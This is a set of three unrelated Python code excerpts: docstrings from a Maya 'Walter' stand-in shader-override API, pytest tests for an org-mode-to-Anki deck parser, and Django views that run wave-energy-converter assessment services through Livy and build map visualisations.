:param str origin: The stand-in object that contains the tree.
:param str path: The path to the sub-object.
:returns: The list of all the origin items in the scene.
:rtype: list
"""
return self.details.dir(origin, path)
def props(self, origin, path):
"""
Return the list of properties of the given path.
:Example:
.. code:: python
from pprint import pprint
from walter import Walter
properties = Walter().props(
"walterStandinShape1", "/ships_greyjoy_shd_hi/mesh")
pprint(properties)
:Output:
.. code:: python
[u'/ships_greyjoy_shd_hi/mesh/M_defaultShip_GRP',
u'/ships_greyjoy_shd_hi/mesh/M_segmentsBreakA_GRP',
u'/ships_greyjoy_shd_hi/mesh/M_segmentsBreakB_GRP']
:param str origin: The stand-in object that contains the tree.
:param str path: The path to the sub-object.
:returns: The list of all the properties of the object at the given path.
:rtype: list
"""
return self.details.props(origin, path)
def setOverride(self, origin, layer, path, material, overrideType):
"""
Save the material/displacement from the Maya nodes. It's looking for the
connections of the Walter Stand-in object and creates/replaces the
connection to the material.
:Example:
.. code:: python
from walter import Walter
from walter import OVERRIDE_SHADER
# Assign lambert1 to the root of walterStandinShape1
Walter().setOverride(
"walterStandinShape1",
"defaultRenderLayer",
"/",
"lambert1",
OVERRIDE_SHADER)
:param str origin: The stand-in object.
:param str layer: Render layer to save the material.
:param str path: The full Alembic path of the sub-object.
:param str material: The material/displacement/walterOverride object.
:param str overrideType:
OVERRIDE_ATTRIBUTE or OVERRIDE_DISPLACEMENT or OVERRIDE_SHADER
"""
return self.details.setOverride(
origin, layer, path, material, overrideType)
def detachOverride(self, origin, layer, path, overrideType, overrideName):
"""
Detach override from the path. It clears the connections of the given
Alembic path.
:Example:
.. code:: python
from walter import Walter
from walter import OVERRIDE_SHADER
# Detach shader from the root of walterStandinShape1
Walter().detachOverride(
"walterStandinShape1",
"defaultRenderLayer",
"/",
OVERRIDE_SHADER)
:param str origin: The stand-in object.
:param str layer: Render layer to save the material.
:param str path: The full Alembic path of the sub-object.
:param str overrideType:
OVERRIDE_ATTRIBUTE or OVERRIDE_DISPLACEMENT or OVERRIDE_SHADER
"""
return self.details.detachOverride(origin, layer, path,
overrideType, overrideName)
def overrides(self, origin, layer, overrideType):
"""
Return override assignment structure for given origin.
:param str origin: The stand-in object.
:param str layer: Render layer to save the material.
:param str overrideType:
OVERRIDE_ATTRIBUTE or OVERRIDE_DISPLACEMENT or OVERRIDE_SHADER
:returns:
The assignment structure. Looks like this:
{'aiStandard1': ['/pSphere1/pTorus1'], "aiStandard2": ['/', '/box']}
:rtype: dict
"""
return self.details.overrides(origin, layer, overrideType)
def action(self, obj):
"""
Perform some action with the given object. It happens when the user
clicks the button on the Alembic object of the tree view. Usually, it's
select.
:param str obj: The object to perform the action.
"""
return self.details.action(obj)
def layers(self, origin):
"""
Return all the layers of the origin item.
:param str origin: The stand-in object.
:returns: All the render layers of the stand-in object.
:rtype: list
"""
return self.details.layers(origin)
def currentLayer(self):
"""
Return the currently editable layer.
:returns: The current render layer.
:rtype: str
"""
return self.details.currentLayer()
def produceOverrides(self, object):
"""
Check what overrides it's possible to get from this object.
:Example:
.. code:: python
print Walter().produceOverrides("lambert1")
print Walter().produceOverrides("walterOverride1")
print Walter().produceOverrides("initialShadingGroup")
:Output:
.. code:: python
[('lambert1', 'shader')]
[('walterOverride1', 'attribute')]
[(u'lambert1', 'shader'), (u'displacementShader2', 'displacement')]
:returns: A list with override objects and types.
:rtype: list
"""
return self.details.produceOverrides(object)
def overrideType(self, object):
"""
Deprecated. Use produceOverrides instead.
Check the type of the object and return which override we can use. For a
shader, it should return OVERRIDE_SHADER, for a displacement it should
return OVERRIDE_DISPLACEMENT.
:Example:
.. code:: python
print Walter().overrideType("lambert1")
print Walter().overrideType("walterOverride1")
:Output:
.. code:: python
shader
attribute
:returns: The override type.
:rtype: str
"""
return self.details.overrideType(object)
def rename(self, origin, oldName, newName):
"""
Rename expression in all the render layers.
:Example:
.. code:: python
from walter import Walter
from walter import OVERRIDE_SHADER
# Create an expresion and assign lambert1 to it
Walter().setOverride(
"walterStandinShape1",
"defaultRenderLayer",
"/*",
"lambert1",
OVERRIDE_SHADER)
# Rename the expression
Walter().rename("walterStandinShape1", "/*", "/*/*")
:param str origin: The stand-in object.
:param str oldName: The given expression.
:param str newName: The new expression.
"""
return self.details.rename(origin, oldName, newName)
def remove(self, origin, path):
"""
Remove the expression in all the render layers.
:Example:
.. code:: python
from walter import Walter
# Remove the expression
Walter().remove("walterStandinShape1", "/*/*")
:param str origin: The stand-in object.
:param str path: The given expression.
"""
return self.details.remove(origin, path)
def create(self, overrideType):
"""
Create an override object and return its name. For now, it works with
attributes only. It should create a walterOverride object.
:Example:
.. code:: python
from walter import Walter
from walter import OVERRIDE_ATTRIBUTE
# Create walterOverride
override = Walter().create(OVERRIDE_ATTRIBUTE)
# Create an expression and assign the override on it
Walter().setOverride(
"walterStandinShape1",
"defaultRenderLayer",
"/pShpere*",
override,
OVERRIDE_ATTRIBUTE)
:param str overrideType:
OVERRIDE_ATTRIBUTE or OVERRIDE_DISPLACEMENT or OVERRIDE_SHADER
:returns: The name of the new object.
:rtype: str
"""
return self.details.create(overrideType)
def saveAssignment(self, origin, fileName=None):
"""
Save the shader assignment to the external file. If the file is not
specified, show the dialog.
:param str origin: The stand-in object.
:param str fileName: The target Alembic file.
"""
return self.details.saveAssignment(origin, fileName)
def saveAttributes(self, origin, fileName=None):
"""
Save the walterOverride nodes to the external file. If the file is not
specified, show the dialog.
:param str origin: The stand-in object.
:param str fileName: The target Alembic file.
"""
return self.details.saveAttributes(origin, fileName)
def saveMaterials(self, origin, fileName=None):
"""
Save the materials to the external file. If the file is not specified,
show the dialog.
:param str origin: The stand-in object.
:param str fileName: The target Alembic file.
"""
return self.details.saveMaterials(origin, fileName)
def saveTransforms(self, origin, fileName=None):
"""
Save the transformation nodes to the external file. If the file is not
specified, show the dialog.
:param str origin: The stand-in object.
:param str fileName: The target file.
"""
return self.details.saveTransforms(origin, fileName)
def savePurposes(self, origin, fileName=None):
"""
Save the usd purposes to the external file. If the file is not
specified, show the dialog.
:param str origin: The stand-in object.
:param str fileName: The target file.
"""
return self.details.savePurposes(origin, fileName)
def saveVariantsLayer(self, origin, fileName=None):
"""
Save the usd variants layer to the external file. If the file is not
specified, show the dialog.
:param str origin: The stand-in object.
:param str fileName: The target file.
"""
return self.details.saveVariantsLayer(origin, fileName)
def setGroup(self, origin, path, group):
"""
Set the group of the given expression.
:param str origin: The stand-in object.
:param str path: The given expression.
:param str group: The given group.
"""
return self.details.setGroup(origin, path, group)
def expressionGroups(self, origin):
"""
Get all available expression groups.
:param str origin: The stand-in object.
"""
return self.details.expressionGroups(origin)
def expressions(self, origin, group=None):
"""
Get all the expressions of the specified group.
:param str origin: The stand-in object.
:param str group: The given group.
"""
return self.details.expressions(origin, group)
def exposeTransforms(self, origin, alembicObject):
"""
Create the locations objects for the object and its parents in the maya
scene and connect them to the walter | |
import sys
sys.path.append('../src/org_to_anki')
from org_to_anki.org_parser import parseData
from org_to_anki.ankiClasses.AnkiQuestion import AnkiQuestion
from org_to_anki.ankiClasses.AnkiDeck import AnkiDeck
from org_to_anki.org_parser.DeckBuilder import DeckBuilder
### Test basic deck is parsed and built correctly ###
def testBasicPraseNamedCorrectly():
filename = "tests/testData/basic.org"
actualDeck = parseData.parse(filename)
assert(actualDeck.deckName == "basic")
def testFileWithNoQuestions():
filename = "tests/testData/empty.org"
actualDeck = parseData.parse(filename)
assert(len(actualDeck.getQuestions()) == 0)
def testBaiscPraseQuestsion():
filename = "tests/testData/basic.org"
actualDeck = parseData.parse(filename)
assert(actualDeck.getQuestions()[0].question[0] == "Put request")
assert(actualDeck.getQuestions()[0].getAnswers() == ["Puts file / resource at specific url", "If file ==> exists => replaces // !exist => creates", "Request => idempotent"])
def testBasicParseMainDeckParameters():
filename = "tests/testData/basic.org"
actualDeck = parseData.parse(filename)
assert(actualDeck._comments == ['# Quick Anki notes', '# listType = bulletPoints'])
assert(actualDeck._parameters == {'listType': 'bulletPoints'})
def testBasicParseQuestionsHaveParametersAndParameters():
filename = "tests/testData/basic.org"
actualDeck = parseData.parse(filename)
params = {'other': 'test', 'listType': 'bulletPoints'} # List type if inherited from parent deck
comments = ['# other=test']
assert(actualDeck.getQuestions()[0]._parameters == params)
assert(actualDeck.getQuestions()[0]._comments == comments)
### Test basic deck parse with sublevels ###
def testBasicWithSublevelsAnswers():
filename = "tests/testData/basicWithSublevels.org"
actualDeck = parseData.parse(filename)
answers = ['.jar => contains libraries / resources / accessories files', '.war => contain the web application => jsp / html / javascript / other files', ['Need for web apps', ["fourth 1", "fourth 2"], "back to third"]]
assert(actualDeck.getQuestions()[0]._answers == answers)
def testFormatFile():
filename = "tests/testData/basic.org"
data = parseData._formatFile(filename)
assert(len(data) == 8)
def testSortData():
lines = """#Comment 1
# Indented comment 2
* line 1
# type=basic
** line 2
badlyformated line
""".split("\n")
assert(len(lines) == 8)
comments, content = DeckBuilder()._sortData(lines)
assert(len(comments) == 2)
assert(len(content) == 4)
### Test topics deck built correctly ###
def testTopicsDeckNamedCorrectly():
filename = "tests/testData/topicsLayout.org"
actualDeck = parseData.parse(filename)
assert(actualDeck.deckName == "topicsLayout")
def testTopicsSubDecksNamedCorrectly():
filename = "tests/testData/topicsLayout.org"
actualDeck = parseData.parse(filename)
assert(actualDeck.subDecks[0].deckName == "Capital cites")
assert(actualDeck.subDecks[1].deckName == "Languages of countries")
def testMainDeckHasComment():
filename = "tests/testData/topicsLayout.org"
actualDeck = parseData.parse(filename)
comments = ['# More advanced org file layout. Each topics has its own questions.', '#fileType = topics']
assert(actualDeck._comments == comments)
def testMainDeckHasParameters():
filename = "tests/testData/topicsLayout.org"
actualDeck = parseData.parse(filename)
params = {'fileType': 'topics'}
assert(actualDeck._parameters == params)
def testSubDeck1QuestionHasParamters():
filename = "tests/testData/topicsLayout.org"
actualDeck = parseData.parse(filename)
params = {'type': 'Basic (and reversed card)'}
comments = ["# type = basic","#type=Basic (and reversed card)"]
assert(actualDeck.subDecks[1].getQuestions()[0]._parameters == params)
assert(actualDeck.subDecks[1].getQuestions()[0]._comments == comments)
def testSubDeck0HasBasicQuestion():
filename = "tests/testData/topicsLayout.org"
actualDeck = parseData.parse(filename)
q1 = AnkiQuestion("What is the capital of Ireland")
q1.addAnswer("Dublin")
q1.deckName = "Capital cites"
assert(actualDeck.subDecks[0].getQuestions()[0].question[0] == "What is the capital of Ireland")
assert(actualDeck.subDecks[0].getQuestions()[0]._answers == ["Dublin"])
def testSubDeck1HasBasicQuestion():
filename = "tests/testData/topicsLayout.org"
actualDeck = parseData.parse(filename)
assert(actualDeck.subDecks[1].getQuestions()[0].question[0] == "What are the main languages in Ireland")
assert(actualDeck.subDecks[1].getQuestions()[0]._answers == ["English", "Irish"])
def testEmptyLinesHandledCorrectly():
data = ["* Question line 1","","** Answer"]
deckBuilder = DeckBuilder()
deck = deckBuilder.buildDeck(data, "test Deck", "")
def testMultiLineQuestion():
data = ["* Question line 1","* Question line 2","** Answer"]
deckBuilder = DeckBuilder()
deck = deckBuilder.buildDeck(data, "test Deck", "")
expectedQuestion = AnkiQuestion()
q1 = AnkiQuestion("What is the capital of Ireland")
expectedQuestion.addQuestion("Question line 1")
expectedQuestion.addQuestion("Question line 2")
expectedQuestion.addAnswer("Answer")
assert(deck.getQuestions()[0].question == expectedQuestion.question)
print(deck.getQuestions()[0]._answers)
assert(deck.getQuestions()[0]._answers == expectedQuestion._answers)
# Test flat topics layout
def testFlatTopics():
filename = "tests/testData/flatTopics.org"
actualDeck = parseData.parse(filename)
question1 = actualDeck.getQuestions()[0]
assert(question1.getQuestions()[0] == "Capital cites\nWhat is the capital of Ireland")
assert(question1.getAnswers()[0] == "Dublin")
question2 = actualDeck.getQuestions()[1]
assert(question2.getQuestions()[0] == "Capital cites\nWhat is the capital of Germany")
assert(question2.getAnswers()[0] == "Berlin")
question3 = actualDeck.getQuestions()[2]
assert(question3.getQuestions()[0] == "Languages of countries\nWhat is the main languages in Ireland")
assert(question3.getAnswers()[0] == "Irish")
question4 = actualDeck.getQuestions()[3]
assert(question4.getQuestions()[0] == "Languages of countries\nWhat is the main languages in Germany")
assert(question4.getAnswers()[0] == "German")
def testOrganisedTopics():
filename = "tests/testData/organisedFile.org"
actualDeck = parseData.parse(filename)
question1 = actualDeck.getQuestions()[0]
assert(question1.getQuestions()[0] == "First main rule of scalability?")
assert(question1.getAnswers()[0] == "Each server behind load balancer")
question2 = actualDeck.getQuestions()[1]
assert(question2.getQuestions()[0] == "What is the main purpose of the factory pattern?")
assert(question2.getAnswers()[0] == "Allow reference to objects via an interface")
def testOrganisedFlatTopics():
filename = "tests/testData/organisedFlatFile.org"
actualDeck = parseData.parse(filename)
question1 = actualDeck.getQuestions()[0]
assert(question1.getQuestions()[0] == "Systems design primer\nFirst main rule of scalability?")
assert(question1.getAnswers()[0] == "Each server behind load balancer")
assert(question1.getAnswers()[1] == "Contains same codebase and does not store any user related data")
question2 = actualDeck.getQuestions()[1]
assert(question2.getQuestions()[0] == "Systems design primer\nWhere should sessions be stored?")
assert(question2.getAnswers()[0] == "Centralized data store accessible to servers")
question3 = actualDeck.getQuestions()[2]
assert(question3.getQuestions()[0] == "Programming design patterns (online version)\nWhat is the main purpose of the factory pattern? (2)")
assert(question3.getAnswers()[0] == "To allow object creation without exposing the creation logic to client")
assert(question3.getAnswers()[1] == "Allow reference to objects via an interface")
def testParseCodeInBackQuotes():
filename = "tests/testData/codeQuestion.org"
actualDeck = parseData.parse(filename)
questions = actualDeck.getQuestions()
assert(questions[0].getCodeLanguage() == "python")
assert(questions[0].getCodeSection() == ["print(\"hello world\")"])
assert(questions[1].getCodeLanguage() == "python")
assert(questions[1].getCodeSection() == ["if (this):", " print(\"worked\")"])
def testParseCodeIsFormatted():
filename = "tests/testData/codeQuestion.org"
actualDeck = parseData.parse(filename)
questions = actualDeck.getQuestions()
print(questions[0].getAnswers()[1])
assert(questions[0].getAnswers()[1] == """<div style="text-align:left"> <div class="highlight" style="background: #ffffff"><pre style="line-height: 125%"><span></span><span style="color: #008800; font-weight: bold">print</span>(<span style="background-color: #fff0f0">"hello world"</span>)<br></pre></div> </div>""")
assert(questions[1].getAnswers()[0] == """<div style="text-align:left"> <div class="highlight" style="background: #ffffff"><pre style="line-height: 125%"><span></span><span style="color: #008800; font-weight: bold">if</span> (this):<br> <span style="color: #008800; font-weight: bold">print</span>(<span style="background-color: #fff0f0">"worked"</span>)<br></pre></div> </div>""")
def testEmptyLinesAreIgnored():
data = ["* ","** ","* order list","** Answer"]
deck = parseData._buildDeck(data, "test.org")
assert(len(deck.getQuestions()) == 1)
assert(deck.getQuestions()[0].getQuestions() == ["order list"])
assert(deck.getQuestions()[0].getAnswers() == ["Answer"])
def testStrangeOrgData():
data = ["* Planner [0/0]", "** Planner [/]", "#type=notes","** Something",":LOGBOOK:","CLOCK: [2019-04-19 Fri 14:27]--[2019-04-19 Fri 14:27] => 0:00", ":END:","* order list","** Answer"]
deck = parseData._buildDeck(data, "test.org")
assert(len(deck.getQuestions()) == 1)
assert(deck.getQuestions()[0].getQuestions() == ["order list"])
assert(deck.getQuestions()[0].getAnswers() == ["Answer"])
def testParsingExtraFieldLinesWithMultipleFields():
data = ["* Question", "** Answer", "#fieldName=Front hint, x=y", "** front hint","#fieldName=Back hint", "** back hint"]
deck = parseData._buildDeck(data, "test.org")
assert(len(deck.getQuestions()) == 1)
assert(deck.getQuestions()[0].getQuestions() == ["Question"])
assert(deck.getQuestions()[0].getAnswers() == ["Answer"])
namedFields = deck.getQuestions()[0].getNamedFields()
assert(len(namedFields))
# No guarantee of ordering
if namedFields[0].getFieldName() == "Front hint":
a, b = 0, 1
else:
a, b = 1, 0
assert(namedFields[a].getFieldName() == "Front hint")
assert(namedFields[a].getLines() == ["front hint"])
assert(namedFields[b].getFieldName() == "Back hint")
assert(namedFields[b].getLines() == ["back hint"])
def testParsingExtraFieldLinesForMultipleQuestions():
data = ["* Qusetion 1", "** Answer 1", "#fieldName=Front", "** front hint","* Question 2", "** Answer 2"]
deck = parseData._buildDeck(data, "test.org")
assert(len(deck.getQuestions()) == 2)
assert(len(deck.getQuestions()[1].getNamedFields()) == 0)
def testParsingUnicodeCharacters():
# data = ['* Hello world in Chinese?', '** 你好']
# deck = parseData._buildDeck(data, "test.org")
filename = "tests/testData/unicode.org"
actualDeck = parseData.parse(filename)
print(actualDeck.getQuestions()[0])
question = actualDeck.getQuestions()[0]
assert(question.getQuestions()[0] == "Hello world in Chinese?")
assert(question.getAnswers()[0] == "你好")
def testOrgFormattingIsParsedWithoutError():
data = ['* Planning', ' # type = notes', '** Time planner', ' :LOGBOOK:', ' CLOCK: [2019-04-15 Mon 12:52]--[2019-04-15 Mon 13:17] => 0:25', ' :END:', '** Sections', ' 1. [X] l1', ' 13. [ ] l10?']
deck = parseData._buildDeck(data, "test.org")
assert(deck)
def testSectionAreConvertedIntoDecksIndependnatlyForOrganisedFile():
data = ['# fileType=organisedFile ', '* Planning', ' # type = notes', '** Time planner', '* L1 Intro', '** What are the 3 main motivations for malware?', '*** money', '*** hacktivism', '*** nation state', '** What is an APT?', '*** Advanced persistent threat']
actualDeck = parseData._buildDeck(data, "test.org")
assert(len(actualDeck.getQuestions()[0].getQuestions()) == 1)
assert(actualDeck.getQuestions()[0].getQuestions()[0] == "What are the 3 main motivations for malware?")
assert(actualDeck.getQuestions()[0]._parameters == {'fileType': 'organisedFile'})
def testTopicsDeckHasEachSectionParsedIndependently():
filename = "tests/testData/topicsLayout1.org"
actualDeck = parseData.parse(filename)
params = {'type': 'basic'}
comments = ["#type=basic"]
assert(len(actualDeck.subDecks) == 2)
assert(actualDeck.subDecks[0]._comments == [])
assert(actualDeck.subDecks[0]._parameters == {})
assert(actualDeck.subDecks[1].getQuestions()[0]._comments == ['# type = basic', '#type=Basic (and reversed card)'])
assert(actualDeck.subDecks[1].getQuestions()[0]._parameters == {'type': 'Basic (and reversed card)'})
assert(actualDeck.subDecks[1].getQuestions()[1]._comments == ['# type = basic'])
assert(actualDeck.subDecks[1].getQuestions()[1]._parameters == {'type': 'basic'})
def testParsingClozeQuestions():
filename = "tests/testData/cloze.org"
actualDeck = parseData.parse(filename)
assert(len(actualDeck.getQuestions()) == 4)
assert(actualDeck.getQuestions()[0].getQuestions() == ["When was Dublin founded {{c1::1204}}"])
assert(actualDeck.getQuestions()[0].getAnswers() == ["Some extra info"])
assert(actualDeck.getQuestions()[0].getParameter("type") == "Cloze")
# Check can form Cloze card without answer
assert(actualDeck.getQuestions()[1].getQuestions() == ["When was Dublin founded {{c1::1204}}"])
assert(actualDeck.getQuestions()[1].getAnswers() == [])
# Check that 4th questions is not affect by previous cloze types
assert(actualDeck.getQuestions()[3].getQuestions() == ["Normal Question"])
def testSectionLevelClozeCardsAreIgnored():
data = ['# cardType=Cloze', '#type=Cloze','* Question 1', '** Answer 1']
actualDeck = parseData._buildDeck(data, "test.org")
assert(actualDeck.getQuestions()[0].getParameter("cardType") == None)
assert(actualDeck.getQuestions()[0].getParameter("type") == None)
def testDeckWithTagsData():
data = ['# tags=a,b,c', '* Question 1', '** Answer 1']
actualDeck = parseData._buildDeck(data, "test.org")
assert(actualDeck.getQuestions()[0].getTags() == ['a', 'b', 'c'])
def testCardsWithTagsData():
data = ['* Question 1', '# tags=a,b,c', '** Answer 1']
actualDeck = parseData._buildDeck(data, "test.org")
assert(actualDeck.getQuestions()[0].getTags() == ['a', 'b', 'c'])
def testCardWithImageUrl_CommandLineMode():
data = ["* Question", "** Image below", "** [image=https://lh3.googleusercontent.com/gdEMfGtrSRTvbTiXwysYJ_5XxqieWt0Z9vtFw0jQxOlbjo43_PJYa4kCusZjmkbe_euwGa4KAWEo2xJvEzHkwIpVN3H-XvCxVXCpQNOcH9_tERcVodYf75t18hYlargfKgYtHYvM]"]
actualDeck = parseData._buildDeck(data, "test.org")
# print(len(actualDeck.getQuestions()[0].getMedia()[0].data))
assert(len(actualDeck.getQuestions()[0].getMedia()[0].data) == 68035)
def testCardWithImageUrl_CommandLineMode_imageInQuestion_bug():
data = ["* Question [image=https://lh3.googleusercontent.com/gdEMfGtrSRTvbTiXwysYJ_5XxqieWt0Z9vtFw0jQxOlbjo43_PJYa4kCusZjmkbe_euwGa4KAWEo2xJvEzHkwIpVN3H-XvCxVXCpQNOcH9_tERcVodYf75t18hYlargfKgYtHYvM]", "** Answer"]
actualDeck = parseData._buildDeck(data, "test.org")
# Assert that the url is not used
# hash of url is used instead
assert(actualDeck.getQuestions()[0].getQuestions()[0] == 'Question <img src="downloaded_image_8c9773be01c71c9b07bcad50cd83dd1b" />')
assert(len(actualDeck.getQuestions()[0].getMedia()[0].data) == 68035)
# TODO assert url points to a file and not to the url
def testUrlIsNotUsedForName():
data = | |
GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print 'result: ' + str(result)
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
location_lat = str(result['location_lat'])
location_lon = str(result['location_lon'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
converters = [str(name) for name in result['name']]
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/wec_location_assessment result.html',
{'result': result,
'back_url': '/wave-energy/energy_conversion/',
'service_title': 'Wave Energy - Assessment of Wave Energy Converters in a Single Location',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': '(' + location_lat + ', ' + location_lon + ') +/- ' + str(DATA_RADIUS) + ' degrees'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'},
{'icon': 'fas fa-water', 'text': 'WEC technologies:', 'value': str(converters)}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def wec_area_evaluation_execute(request):
service = Service.objects.get(pk=settings.WEC_AREA_EVALUATION_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
# Spawn thread to process the data
t = Thread(target=wec_area_evaluation_execution_process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
def wec_area_evaluation_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
# GATHER THE SERVICE ARGUMENTS
service_args = ["latitude_from", "latitude_to", "longitude_from", "longitude_to", "start_date", "end_date"]
args_to_note = gather_service_args(service_args, request, service_exec)
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.GET["dataset_id"])).table_name
converters_selection = request.GET.getlist("converters[]")
wecs = list()
for converter_id in converters_selection:
aWec = dict()
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
aWec['name'] = converter.title
aWec['min_H'] = str(int(round(converter.min_height, 0)))
aWec['max_H'] = str(int(round(converter.max_height)))
aWec['min_T'] = str(int(round(converter.min_energy_period)))
aWec['max_T'] = str(int(round(converter.max_energy_period)))
aWec['wec_matrix'] = converter.sample_rows
wecs.append(aWec)
args_to_note['wecs'] = wecs
# args_to_note['dataset_id'] = settings.WEC_GENERATION_FORECAST_SERVICE_DATASET_QUERY.keys()[0]
args_to_note['dataset_id'] = request.GET['dataset_id']
# args_to_note['start_date'] = str(Dataset.objects.get(pk=int(args_to_note['dataset_id'])).temporalCoverageBegin)
# args_to_note['end_date'] = str(Dataset.objects.get(pk=int(args_to_note['dataset_id'])).temporalCoverageEnd)
service_exec.arguments = args_to_note
service_exec.save()
# CONFIGURE THE QUERY TO BE USED
# dataset_id = settings.WEC_AREA_EVALUATION_SERVICE_DATASET_QUERY.keys()[0]
dataset_id = request.GET['dataset_id']
query_id = settings.WEC_AREA_EVALUATION_SERVICE_DATASET_QUERY[dataset_id]
wave_height_query_id = get_query_with_updated_filters(request, query_id)
# CLONE THE SERVICE NOTE
new_notebook_id = clone_service_note(request, service, service_exec)
# ADD THE VISUALISATIONS TO BE CREATED
visualisations = dict()
power_cols_str = ''
cap_factors_cols_str = ''
shut_down_cols_str = ''
for i, converter_id in enumerate(converters_selection):
converter = Wave_Energy_Converters.objects.get(pk=int(converter_id))
power_cols_str += '&contour_var0=power for ' + str(converter.title) + '&contour_var_unit0=kW/m'
cap_factors_cols_str += '&contour_var0=capacity factor for ' + str(converter.title) + '&contour_var_unit0=%'
shut_down_cols_str += '&contour_var0=danger times for ' + str(converter.title) + '&contour_var_unit0=hours'
visualisations['v1'] = ({'notebook_id': new_notebook_id,
'df': 'power_df',
'query': '',
'title': "WEC Average Power Output",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&n_contours0=50&step0=0.1&agg_func=AVG&lat_col0=i0_latitude&lon_col0=i0_longitude&df0=power_df¬ebook_id0=" + str(new_notebook_id) + power_cols_str,
'done': False})
visualisations['v2'] = ({'notebook_id': new_notebook_id,
'df': 'wec_cap_factors_df',
'query': '',
'title': "WEC Capacity Factor",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&n_contours0=50&step0=0.1&agg_func=AVG&lat_col0=i0_latitude&lon_col0=i0_longitude&df0=wec_cap_factors_df¬ebook_id0=" + str(new_notebook_id) + cap_factors_cols_str,
'done': False})
visualisations['v3'] = ({'notebook_id': new_notebook_id,
'df': 'danger_times_df',
'query': '',
'title': "Number of Shut Down Hours",
'url': "/visualizations/get_map_visualization/?layer_count=1&viz_id0=20&action0=get_map_contour&n_contours0=50&step0=0.1&agg_func=AVG&lat_col0=i0_latitude&lon_col0=i0_longitude&df0=danger_times_df¬ebook_id0=" + str(new_notebook_id) + shut_down_cols_str,
'done': False})
service_exec.dataframe_visualizations = visualisations
service_exec.save()
# CREATE NEW ARGUMENTS PARAGRAPH
new_arguments_paragraph = create_args_paragraph(request, new_notebook_id, args_to_note, service)
# CREATE A LIVY SESSION
if service.through_livy:
service_exec.status = "Initializing Spark Session"
service_exec.save()
service_exec.livy_session = create_service_livy_session(request, service_exec)
service_exec.save()
try:
# RUN THE SERVICE CODE
execute_service_code(request, service_exec, new_arguments_paragraph, settings.WEC_AREA_EVALUATION_SERVICE_PARAGRAPHS)
service_exec.status = "done"
service_exec.save()
try:
dataset_obj = Dataset.objects.get(id=int(dataset_id))
service_obj = service_exec.service
dataset_service_execution(dataset_obj, service_obj)
service_use(service_obj)
unique_service_use(service_obj, request.user)
service_per_user(service_obj, request.user)
nester_statistics(service_obj, dataset_obj)
except:
print 'Dataset or service does not exist'
t = Thread(target=clean_up_new_note, args=(str(new_notebook_id), 360))
t.start()
except Exception as e:
print 'exception in livy execution'
print '%s (%s)' % (e.message, type(e))
service_exec.status = "failed"
service_exec.save()
# clean_up_new_note(service_exec.notebook_id)
if 'livy_session' in request.GET.keys():
pass
else:
if service_exec.service.through_livy:
close_livy_session(service_exec.livy_session)
@never_cache
def wec_area_evaluation_results(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
# GET THE SERVICE RESULTS
result = get_result_dict_from_livy(service_exec.livy_session, 'result')
print 'result: ' + str(result)
# clean_up_new_note(service_exec.notebook_id)
dataset_id = str(result['dataset_id'])
dataset_title = str(Dataset.objects.get(pk=dataset_id))
latitude_from = str(result['latitude_from'])
latitude_to = str(result['latitude_to'])
longitude_from = str(result['longitude_from'])
longitude_to = str(result['longitude_to'])
start_date = str(result['start_date'])
end_date = str(result['end_date'])
converters = [str(name) for name in result['name']]
# SHOW THE SERVICE OUTPUT PAGE
return render(request, 'wave_energy_pilot/wec_area_assessment result.html',
{'result': result,
'back_url': '/wave-energy/energy_conversion/',
'service_title': 'Wave Energy - Performance of Wave Energy Converter in a Wide Area',
'study_conditions': [{'icon': 'fas fa-map-marker-alt', 'text': 'Location (latitude, longitude):','value': 'from (' + latitude_from + ', ' + longitude_from + ') to (' + latitude_to + ', ' + longitude_to + ')'},
{'icon': 'far fa-calendar-alt', 'text': 'Timeframe:','value': 'from ' + str(start_date) + ' to ' + str(end_date)},
{'icon': 'fas fa-database', 'text': 'Dataset used:', 'value': str(dataset_title) + ' <a target="_blank" rel="noopener noreferrer" href="/datasets/' + str(dataset_id) + '/" style="color: #1d567e;text-decoration: underline">(more info)</a>'},
{'icon': 'fas fa-water', 'text': 'WEC technologies:', 'value': str(converters)}],
'no_viz': 'no_viz' in request.GET.keys(),
'visualisations': service_exec.dataframe_visualizations})
@never_cache
def wec_generation_forecast_execute(request):
service = Service.objects.get(pk=settings.WEC_GENERATION_FORECAST_SERVICE_ID)
check_access(request, service)
service_exec = ServiceInstance(service=service, user=request.user, time=datetime.now(),
status="starting service", dataframe_visualizations=[])
service_exec.save()
# Spawn thread to process the data
t = Thread(target=wec_generation_forecast_execution_process, args=(request, service_exec.id))
t.start()
return JsonResponse({'exec_instance': service_exec.id})
def wec_generation_forecast_execution_process(request, exec_instance):
service_exec = ServiceInstance.objects.get(pk=int(exec_instance))
service = Service.objects.get(pk=service_exec.service_id)
# GATHER THE SERVICE ARGUMENTS
service_args = ["start_date", "end_date", "latitude_from", "latitude_to", "longitude_from", "longitude_to"]
args_to_note = gather_service_args(service_args, request, service_exec)
args_to_note['dataset_table'] = Dataset.objects.get(pk=int(request.GET['dataset_id'])).table_name
converters_selection = request.GET.getlist("converters[]")
wecs = list()
for converter_id in converters_selection:
aWec = dict()
